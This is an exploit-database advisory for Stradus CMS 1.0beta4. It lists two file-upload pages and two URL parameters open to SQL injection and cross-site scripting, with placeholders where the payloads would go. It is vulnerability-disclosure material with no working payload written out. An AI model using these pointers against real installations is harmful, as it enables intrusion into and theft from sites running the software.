Stradus CMS 1.0beta4 - Multiple Vulnerabilities

Author: DaOne
type: webapps
platform: php
port: 
date_added: 2013-03-22 
date_updated: 2013-03-24 
verified: 1 
codes: OSVDB-91947;OSVDB-91946;OSVDB-91945;OSVDB-91944;OSVDB-91943;OSVDB-91942 
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt25000/scms.png 
application_url: http://www.exploit-db.comSCMS.png

##########################################
[~] Exploit Title: Stradus CMS Multiple Vulnerabilities
[~] Date: 21-03-2013
[~] Author: DaOne aka Mocking Bird
[~] Vendor Homepage: http://stradus.eu/
[~] Software Link: http://sourceforge.net/projects/straduscms/
[~] Category: webapps/php
[~] Version: 1.0beta4
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6
##########################################

# File Upload
http://localhost/SCMS_1.0/moduls/photo_album/upload.php
http://localhost/SCMS_1.0/moduls/simply_image/upload.php

# XSS / SQL Injection
http://localhost/SCMS_1.0/adminfiles/log_view.php?order_by={SQLi/XSS}
http://localhost/SCMS_1.0/moduls/photo_album/new.php?edit={SQLi/XSS}